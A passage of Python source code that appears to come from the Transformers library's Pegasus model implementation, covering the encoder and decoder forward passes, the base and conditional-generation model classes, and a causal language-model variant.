Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors
for more detail.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
# retrieve input_ids and inputs_embeds
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
if inputs_embeds is None:
inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale
embed_pos = self.embed_positions(input_shape)
hidden_states = inputs_embeds + embed_pos
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
# expand attention_mask
if attention_mask is not None:
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
attention_mask = _expand_mask(attention_mask, inputs_embeds.dtype)
encoder_states = () if output_hidden_states else None
all_attentions = () if output_attentions else None
# check if head_mask has a correct number of layers specified if desired
if head_mask is not None:
assert head_mask.size()[0] == (
len(self.layers)
), f"The head_mask should be specified for {len(self.layers)} layers, but it is for {head_mask.size()[0]}."
for idx, encoder_layer in enumerate(self.layers):
if output_hidden_states:
encoder_states = encoder_states + (hidden_states,)
# add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)
dropout_probability = random.uniform(0, 1)
if self.training and (dropout_probability < self.layerdrop): # skip the layer
layer_outputs = (None, None)
else:
if getattr(self.config, "gradient_checkpointing", False) and self.training:
def create_custom_forward(module):
def custom_forward(*inputs):
return module(*inputs, output_attentions)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(encoder_layer),
hidden_states,
attention_mask,
(head_mask[idx] if head_mask is not None else None),
)
else:
layer_outputs = encoder_layer(
hidden_states,
attention_mask,
layer_head_mask=(head_mask[idx] if head_mask is not None else None),
output_attentions=output_attentions,
)
hidden_states = layer_outputs[0]
if output_attentions:
all_attentions = all_attentions + (layer_outputs[1],)
hidden_states = self.layer_norm(hidden_states)
if output_hidden_states:
encoder_states = encoder_states + (hidden_states,)
if not return_dict:
return tuple(v for v in [hidden_states, encoder_states, all_attentions] if v is not None)
return BaseModelOutput(
last_hidden_state=hidden_states, hidden_states=encoder_states, attentions=all_attentions
)
class PegasusDecoder(PegasusPreTrainedModel):
"""
Transformer decoder consisting of *config.decoder_layers* layers. Each layer is a :class:`PegasusDecoderLayer`
Args:
config: PegasusConfig
embed_tokens (nn.Embedding): output embedding
"""
def __init__(self, config: PegasusConfig, embed_tokens: Optional[nn.Embedding] = None):
super().__init__(config)
self.dropout = config.dropout
self.layerdrop = config.decoder_layerdrop
self.padding_idx = config.pad_token_id
self.max_target_positions = config.max_position_embeddings
self.embed_scale = math.sqrt(config.d_model) if config.scale_embedding else 1.0
if embed_tokens is not None:
self.embed_tokens = embed_tokens
else:
self.embed_tokens = nn.Embedding(config.vocab_size, config.d_model, self.padding_idx)
self.embed_positions = PegasusSinusoidalPositionalEmbedding(
config.max_position_embeddings,
config.d_model,
self.padding_idx,
)
self.layers = nn.ModuleList([PegasusDecoderLayer(config) for _ in range(config.decoder_layers)])
self.layer_norm = nn.LayerNorm(config.d_model)
self.init_weights()
def get_input_embeddings(self):
return self.embed_tokens
def set_input_embeddings(self, value):
self.embed_tokens = value
# Copied from transformers.models.bart.modeling_bart.BartDecoder._prepare_decoder_attention_mask
def _prepare_decoder_attention_mask(self, attention_mask, input_shape, inputs_embeds, past_key_values_length):
# create causal mask
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
combined_attention_mask = None
if input_shape[-1] > 1:
combined_attention_mask = _make_causal_mask(
input_shape, inputs_embeds.dtype, past_key_values_length=past_key_values_length
).to(self.device)
if attention_mask is not None:
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
expanded_attn_mask = _expand_mask(attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1])
combined_attention_mask = (
expanded_attn_mask if combined_attention_mask is None else expanded_attn_mask + combined_attention_mask
)
return combined_attention_mask
def resize_position_embeddings(self, new_num_position_embeddings: int):
"""
Resizes position embeddings matrix of the model if :obj:`new_num_position_embeddings !=
config.max_position_embeddings`.
Arguments:
new_num_position_embeddings (:obj:`int`):
The number of new position embeddings. If position embeddings are learned, increasing the size will add
newly initialized vectors at the end, whereas reducing the size will remove vectors from the end. If
position embeddings are not learned (*e.g.* sinusoidal position embeddings), increasing the size will
add correct vectors at the end following the position encoding algorithm, whereas reducing the size
will remove vectors from the end.
"""
logger.info(f"Setting `config.max_position_embeddings={new_num_position_embeddings}`...")
self.config.max_position_embeddings = new_num_position_embeddings
self.embed_positions = PegasusSinusoidalPositionalEmbedding(
self.config.max_position_embeddings,
self.config.d_model,
self.padding_idx,
)
def get_position_embeddings(self) -> nn.Embedding:
"""
Returns the position embeddings matrix
"""
return self.embed_positions
def forward(
self,
input_ids=None,
attention_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
head_mask=None,
cross_attn_head_mask=None,
past_key_values=None,
inputs_embeds=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
provide it.
Indices can be obtained using :class:`~transformers.PegasusTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__`
for details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, encoder_sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
of the decoder.
encoder_attention_mask (:obj:`torch.LongTensor` of shape :obj:`(batch_size, encoder_sequence_length)`, `optional`):
Mask to avoid performing cross-attention on padding tokens indices of encoder input_ids. Mask values
selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
cross_attn_head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the cross-attention modules in decoder to avoid performing
cross-attention on hidden heads. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
past_key_values (:obj:`tuple(tuple(torch.FloatTensor))`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
Tuple of :obj:`tuple(torch.FloatTensor)` of length :obj:`config.n_layers`, with each tuple having 2
tensors of shape :obj:`(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional
tensors of shape :obj:`(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`.
Contains pre-computed hidden-states (key and values in the self-attention blocks and in the
cross-attention blocks) that can be used (see :obj:`past_key_values` input) to speed up sequential
decoding.
If :obj:`past_key_values` are used, the user can optionally input only the last
:obj:`decoder_input_ids` (those that don't have their past key value states given to this model) of
shape :obj:`(batch_size, 1)` instead of all :obj:`decoder_input_ids`` of shape :obj:`(batch_size,
sequence_length)`.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded
representation. This is useful if you want more control over how to convert :obj:`input_ids` indices
into associated vectors than the model's internal embedding lookup matrix.
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under
returned tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`):
Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors
for more detail.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
use_cache = use_cache if use_cache is not None else self.config.use_cache
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
# retrieve input_ids and inputs_embeds
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either decoder_input_ids or decoder_inputs_embeds")
# past_key_values_length
past_key_values_length = past_key_values[0][0].shape[2] if past_key_values is not None else 0
if inputs_embeds is None:
inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale
attention_mask = self._prepare_decoder_attention_mask(
attention_mask, input_shape, inputs_embeds, past_key_values_length
)
# expand encoder attention mask
if encoder_hidden_states is not None and encoder_attention_mask is not None:
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
encoder_attention_mask = _expand_mask(encoder_attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1])
# embed positions
positions = self.embed_positions(input_shape, past_key_values_length)
hidden_states = inputs_embeds + positions
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
# decoder layers
all_hidden_states = () if output_hidden_states else None
all_self_attns = () if output_attentions else None
all_cross_attentions = () if (output_attentions and encoder_hidden_states is not None) else None
next_decoder_cache = () if use_cache else None
# check if head_mask/cross_attn_head_mask has a correct number of layers specified if desired
for attn_mask, mask_name in zip([head_mask, cross_attn_head_mask], ["head_mask", "cross_attn_head_mask"]):
if attn_mask is not None:
assert attn_mask.size()[0] == (
len(self.layers)
), f"The `{mask_name}` should be specified for {len(self.layers)} layers, but it is for {head_mask.size()[0]}."
for idx, decoder_layer in enumerate(self.layers):
# add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)
if output_hidden_states:
all_hidden_states += (hidden_states,)
dropout_probability = random.uniform(0, 1)
if self.training and (dropout_probability < self.layerdrop):
continue
past_key_value = past_key_values[idx] if past_key_values is not None else None
if getattr(self.config, "gradient_checkpointing", False) and self.training:
if use_cache:
logger.warning(
"`use_cache=True` is incompatible with `config.gradient_checkpointing=True`. Setting "
"`use_cache=False`..."
)
use_cache = False
def create_custom_forward(module):
def custom_forward(*inputs):
# None for past_key_value
return module(*inputs, output_attentions, use_cache)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(decoder_layer),
hidden_states,
attention_mask,
encoder_hidden_states,
encoder_attention_mask,
head_mask[idx] if head_mask is not None else None,
cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None,
None,
)
else:
layer_outputs = decoder_layer(
hidden_states,
attention_mask=attention_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
layer_head_mask=(head_mask[idx] if head_mask is not None else None),
cross_attn_layer_head_mask=(
cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None
),
past_key_value=past_key_value,
output_attentions=output_attentions,
use_cache=use_cache,
)
hidden_states = layer_outputs[0]
if use_cache:
next_decoder_cache += (layer_outputs[3 if output_attentions else 1],)
if output_attentions:
all_self_attns += (layer_outputs[1],)
if encoder_hidden_states is not None:
all_cross_attentions += (layer_outputs[2],)
hidden_states = self.layer_norm(hidden_states)
# add hidden states from the last decoder layer
if output_hidden_states:
all_hidden_states += (hidden_states,)
next_cache = next_decoder_cache if use_cache else None
if not return_dict:
return tuple(
v
for v in [hidden_states, next_cache, all_hidden_states, all_self_attns, all_cross_attentions]
if v is not None
)
return BaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
past_key_values=next_cache,
hidden_states=all_hidden_states,
attentions=all_self_attns,
cross_attentions=all_cross_attentions,
)
@add_start_docstrings(
"The bare PEGASUS Model outputting raw hidden-states without any specific head on top.",
PEGASUS_START_DOCSTRING,
)
class PegasusModel(PegasusPreTrainedModel):
def __init__(self, config: PegasusConfig):
super().__init__(config)
padding_idx, vocab_size = config.pad_token_id, config.vocab_size
self.shared = nn.Embedding(vocab_size, config.d_model, padding_idx)
self.encoder = PegasusEncoder(config, self.shared)
self.decoder = PegasusDecoder(config, self.shared)
self.init_weights()
def get_input_embeddings(self):
return self.shared
def set_input_embeddings(self, value):
self.shared = value
self.encoder.embed_tokens = self.shared
self.decoder.embed_tokens = self.shared
def get_encoder(self):
return self.encoder
def get_decoder(self):
return self.decoder
def resize_position_embeddings(self, new_num_position_embeddings: int):
"""
Resizes position embeddings matrix of the model if :obj:`new_num_position_embeddings !=
config.max_position_embeddings`.
Arguments:
new_num_position_embeddings (:obj:`int`):
The number of new position embeddings. If position embeddings are learned, increasing the size will add
newly initialized vectors at the end, whereas reducing the size will remove vectors from the end. If
position embeddings are not learned (*e.g.* sinusoidal position embeddings), increasing the size will
add correct vectors at the end following the position encoding algorithm, whereas reducing the size
will remove vectors from the end.
"""
self.config.max_position_embeddings = new_num_position_embeddings
self.encoder.resize_position_embeddings(new_num_position_embeddings)
self.decoder.resize_position_embeddings(new_num_position_embeddings)
def get_position_embeddings(self) -> Tuple[nn.Embedding]:
"""
Returns the position embeddings matrix
"""
return (self.encoder.get_position_embeddings(), self.decoder.get_position_embeddings())
@add_start_docstrings_to_model_forward(PEGASUS_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=Seq2SeqModelOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids=None,
attention_mask=None,
decoder_input_ids=None,
decoder_attention_mask=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
encoder_outputs=None,
past_key_values=None,
inputs_embeds=None,
decoder_inputs_embeds=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
Returns:
Example::
>>> from transformers import PegasusTokenizer, PegasusModel
>>> tokenizer = PegasusTokenizer.from_pretrained("google/pegasus-large")
>>> model = PegasusModel.from_pretrained("google/pegasus-large")
>>> input_ids = tokenizer("Studies have been shown that owning a dog is good for you", return_tensors="pt").input_ids # Batch size 1
>>> decoder_input_ids = tokenizer("Studies show that", return_tensors="pt").input_ids # Batch size 1
>>> outputs = model(input_ids=input_ids, decoder_input_ids=decoder_input_ids)
>>> last_hidden_states = outputs.last_hidden_state
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
use_cache = use_cache if use_cache is not None else self.config.use_cache
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if encoder_outputs is None:
encoder_outputs = self.encoder(
input_ids=input_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
# If the user passed a tuple for encoder_outputs, we wrap it in a BaseModelOutput when return_dict=True
elif return_dict and not isinstance(encoder_outputs, BaseModelOutput):
encoder_outputs = BaseModelOutput(
last_hidden_state=encoder_outputs[0],
hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None,
attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None,
)
# decoder outputs consists of (dec_features, past_key_value, dec_hidden, dec_attn)
decoder_outputs = self.decoder(
input_ids=decoder_input_ids,
attention_mask=decoder_attention_mask,
encoder_hidden_states=encoder_outputs[0],
encoder_attention_mask=attention_mask,
head_mask=decoder_head_mask,
cross_attn_head_mask=cross_attn_head_mask,
past_key_values=past_key_values,
inputs_embeds=decoder_inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
if not return_dict:
return decoder_outputs + encoder_outputs
return Seq2SeqModelOutput(
last_hidden_state=decoder_outputs.last_hidden_state,
past_key_values=decoder_outputs.past_key_values,
decoder_hidden_states=decoder_outputs.hidden_states,
decoder_attentions=decoder_outputs.attentions,
cross_attentions=decoder_outputs.cross_attentions,
encoder_last_hidden_state=encoder_outputs.last_hidden_state,
encoder_hidden_states=encoder_outputs.hidden_states,
encoder_attentions=encoder_outputs.attentions,
)
@add_start_docstrings(
"The PEGASUS Model with a language modeling head. Can be used for summarization.", PEGASUS_START_DOCSTRING
)
class PegasusForConditionalGeneration(PegasusPreTrainedModel):
base_model_prefix = "model"
_keys_to_ignore_on_load_missing = [
r"final_logits_bias",
r"encoder\.version",
r"decoder\.version",
r"lm_head\.weight",
r"embed_positions\.weight",
]
def __init__(self, config: PegasusConfig):
super().__init__(config)
self.model = PegasusModel(config)
self.register_buffer("final_logits_bias", torch.zeros((1, self.model.shared.num_embeddings)))
self.lm_head = nn.Linear(config.d_model, self.model.shared.num_embeddings, bias=False)
self.init_weights()
def get_encoder(self):
return self.model.get_encoder()
def get_decoder(self):
return self.model.get_decoder()
def resize_token_embeddings(self, new_num_tokens: int) -> nn.Embedding:
new_embeddings = super().resize_token_embeddings(new_num_tokens)
self._resize_final_logits_bias(new_num_tokens)
return new_embeddings
def _resize_final_logits_bias(self, new_num_tokens: int) -> None:
old_num_tokens = self.final_logits_bias.shape[-1]
if new_num_tokens <= old_num_tokens:
new_bias = self.final_logits_bias[:, :new_num_tokens]
else:
extra_bias = torch.zeros((1, new_num_tokens - old_num_tokens), device=self.final_logits_bias.device)
new_bias = torch.cat([self.final_logits_bias, extra_bias], dim=1)
self.register_buffer("final_logits_bias", new_bias)
def get_output_embeddings(self):
return self.lm_head
def set_output_embeddings(self, new_embeddings):
self.lm_head = new_embeddings
def resize_position_embeddings(self, new_num_position_embeddings: int):
"""
Resizes position embeddings matrix of the model if :obj:`new_num_position_embeddings !=
config.max_position_embeddings`.
Arguments:
new_num_position_embeddings (:obj:`int`):
The number of new position embeddings. If position embeddings are learned, increasing the size will add
newly initialized vectors at the end, whereas reducing the size will remove vectors from the end. If
position embeddings are not learned (*e.g.* sinusoidal position embeddings), increasing the size will
add correct vectors at the end following the position encoding algorithm, whereas reducing the size
will remove vectors from the end.
"""
self.config.max_position_embeddings = new_num_position_embeddings
self.model.encoder.resize_position_embeddings(new_num_position_embeddings)
self.model.decoder.resize_position_embeddings(new_num_position_embeddings)
def get_position_embeddings(self) -> Tuple[nn.Embedding]:
"""
Returns the position embeddings matrix
"""
return (self.model.encoder.get_position_embeddings(), self.model.decoder.get_position_embeddings())
@add_start_docstrings_to_model_forward(PEGASUS_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=Seq2SeqLMOutput, config_class=_CONFIG_FOR_DOC)
@add_end_docstrings(PEGASUS_GENERATION_EXAMPLE)
def forward(
self,
input_ids=None,
attention_mask=None,
decoder_input_ids=None,
decoder_attention_mask=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
encoder_outputs=None,
past_key_values=None,
inputs_embeds=None,
decoder_inputs_embeds=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the masked language modeling loss. Indices should either be in ``[0, ...,
config.vocab_size]`` or -100 (see ``input_ids`` docstring). Tokens with indices set to ``-100`` are ignored
(masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]``.
Returns:
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if labels is not None:
if decoder_input_ids is None:
decoder_input_ids = shift_tokens_right(
labels, self.config.pad_token_id, self.config.decoder_start_token_id
)
outputs = self.model(
input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids,
encoder_outputs=encoder_outputs,
decoder_attention_mask=decoder_attention_mask,
head_mask=head_mask,
decoder_head_mask=decoder_head_mask,
cross_attn_head_mask=cross_attn_head_mask,
past_key_values=past_key_values,
inputs_embeds=inputs_embeds,
decoder_inputs_embeds=decoder_inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
lm_logits = self.lm_head(outputs[0]) + self.final_logits_bias
masked_lm_loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
masked_lm_loss = loss_fct(lm_logits.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (lm_logits,) + outputs[1:]
return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output
return Seq2SeqLMOutput(
loss=masked_lm_loss,
logits=lm_logits,
past_key_values=outputs.past_key_values,
decoder_hidden_states=outputs.decoder_hidden_states,
decoder_attentions=outputs.decoder_attentions,
cross_attentions=outputs.cross_attentions,
encoder_last_hidden_state=outputs.encoder_last_hidden_state,
encoder_hidden_states=outputs.encoder_hidden_states,
encoder_attentions=outputs.encoder_attentions,
)
def prepare_inputs_for_generation(
self,
decoder_input_ids,
past=None,
attention_mask=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
use_cache=None,
encoder_outputs=None,
**kwargs
):
# cut decoder_input_ids if past is used
if past is not None:
decoder_input_ids = decoder_input_ids[:, -1:]
return {
"input_ids": None, # encoder_outputs is defined. input_ids not needed
"encoder_outputs": encoder_outputs,
"past_key_values": past,
"decoder_input_ids": decoder_input_ids,
"attention_mask": attention_mask,
"head_mask": head_mask,
"decoder_head_mask": decoder_head_mask,
"cross_attn_head_mask": cross_attn_head_mask,
"use_cache": use_cache, # change this to avoid caching (presumably for debugging)
}
def prepare_decoder_input_ids_from_labels(self, labels: torch.Tensor):
return shift_tokens_right(labels, self.config.pad_token_id, self.config.decoder_start_token_id)
@staticmethod
def _reorder_cache(past, beam_idx):
reordered_past = ()
for layer_past in past:
# cached cross_attention states don't have to be reordered -> they are always the same
reordered_past += (
tuple(past_state.index_select(0, beam_idx) for past_state in layer_past[:2]) + layer_past[2:],
)
return reordered_past
# Copied from transformers.models.bart.modeling_bart.BartDecoderWrapper with Bart->Pegasus
class PegasusDecoderWrapper(PegasusPreTrainedModel):
"""
This wrapper class is a helper class to correctly load pretrained checkpoints when the causal language model is
used in combination with the :class:`~transformers.EncoderDecoderModel` framework.
"""
def __init__(self, config):
super().__init__(config)
self.decoder = PegasusDecoder(config)
def forward(self, *args, **kwargs):
return self.decoder(*args, **kwargs)
class PegasusForCausalLM(PegasusPreTrainedModel):
def __init__(self, config):
super().__init__(config)
config = copy.deepcopy(config)
config.is_decoder = True
config.is_encoder_decoder = False
self.model = PegasusDecoderWrapper(config)
self.lm_head = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
self.init_weights()
def get_input_embeddings(self):
return self.model.decoder.embed_tokens
def set_input_embeddings(self, value):
self.model.decoder.embed_tokens = value
def get_output_embeddings(self):
return self.lm_head
def set_output_embeddings(self, new_embeddings):
self.lm_head = new_embeddings
def set_decoder(self, decoder):
self.model.decoder = decoder
def get_decoder(self):
return self.model.decoder
def get_position_embeddings(self) -> nn.Embedding:
"""
Returns the position embeddings matrix
"""
return self.model.decoder.get_position_embeddings()
def resize_position_embeddings(self, new_num_position_embeddings: int):
"""
Resizes position embeddings matrix of the model if :obj:`new_num_position_embeddings !=
config.max_position_embeddings`.
Arguments:
new_num_position_embeddings (:obj:`int`):
The number of new position embeddings. If position embeddings are learned, increasing the size will add
newly initialized vectors at the end, whereas reducing the size will remove vectors from the end. If
position embeddings are not learned (*e.g.* sinusoidal position embeddings), increasing the size will
add correct vectors at the end following the position encoding algorithm, whereas reducing the size
will remove vectors from the end.
"""
self.config.max_position_embeddings = new_num_position_embeddings
self.model.decoder.resize_position_embeddings(new_num_position_embeddings)
@replace_return_docstrings(output_type=CausalLMOutputWithCrossAttentions, config_class=_CONFIG_FOR_DOC)
# Copied from transformers.models.bart.modeling_bart.BartForCausalLM.forward with Bart->Pegasus
def forward(
self,
input_ids=None,
attention_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
head_mask=None,
cross_attn_head_mask=None,
past_key_values=None,
inputs_embeds=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
provide it.
Indices can be obtained using :class:`~transformers.PegasusTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__`
for details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
if the model is configured as a decoder.
encoder_attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used
in the cross-attention if the model is configured as a decoder. Mask values selected in ``[0, 1]``:
head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
cross_attn_head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the cross-attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
past_key_values (:obj:`tuple(tuple(torch.FloatTensor))`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
Tuple of :obj:`tuple(torch.FloatTensor)` of length :obj:`config.n_layers`, with each tuple having 2
tensors of shape :obj:`(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional
tensors of shape :obj:`(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`. The two
additional tensors are only required when the model is used as a decoder in a Sequence to Sequence
model.
Contains pre-computed hidden-states (key and values in the self-attention blocks and in the
cross-attention blocks) that can be used (see :obj:`past_key_values` input) to speed up sequential
decoding.
If :obj:`past_key_values` are used, the user can optionally input only the last ``decoder_input_ids``
(those that don't have their past key value states given to this model) of shape :obj:`(batch_size, 1)`
instead of all ``decoder_input_ids`` of shape :obj:`(batch_size, sequence_length)`.
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the masked language modeling loss. Indices should either be in ``[0, ...,
config.vocab_size]`` or -100 (see ``input_ids`` docstring). Tokens with indices set to ``-100`` are
ignored (masked), the loss is only computed for the tokens with labels in ``[0, ...,
config.vocab_size]``.
use_cache (:obj:`bool`, `optional`):
If set to :obj:`True`, :obj:`past_key_values` key value states are returned and can be used to speed up
decoding (see :obj:`past_key_values`).
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under
returned tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`):
Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors
for more detail.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.
Returns:
Example::
>>> from transformers import PegasusTokenizer, PegasusForCausalLM
>>> tokenizer = PegasusTokenizer.from_pretrained('facebook/bart-large')
>>> model = PegasusForCausalLM.from_pretrained('facebook/bart-large', add_cross_attention=False)
>>> assert model.config.is_decoder, f"{model.__class__} has to be configured as a decoder."
>>> inputs = tokenizer("Hello, my dog is cute", return_tensors="pt")
>>> outputs = model(**inputs)
>>> last_hidden_states = outputs.last_hidden_state
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
# decoder outputs consists of (dec_features, layer_state, dec_hidden, dec_attn)
outputs = self.model.decoder(
input_ids=input_ids,
attention_mask=attention_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
head_mask=head_mask,
cross_attn_head_mask=cross_attn_head_mask,
past_key_values=past_key_values,
inputs_embeds=inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
logits = self.lm_head(outputs[0])
loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (logits,) + outputs[1:]
return (loss,) + output if loss is not None else output
return CausalLMOutputWithCrossAttentions(
loss=loss,
logits=logits,
past_key_values=outputs.past_key_values,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
cross_attentions=outputs.cross_attentions,
)
def prepare_inputs_for_generation(self, input_ids, past=None, attention_mask=None, use_cache=None, **kwargs):
# if model is used as a decoder in encoder-decoder model, the decoder attention mask is created on the fly
if attention_mask is None:
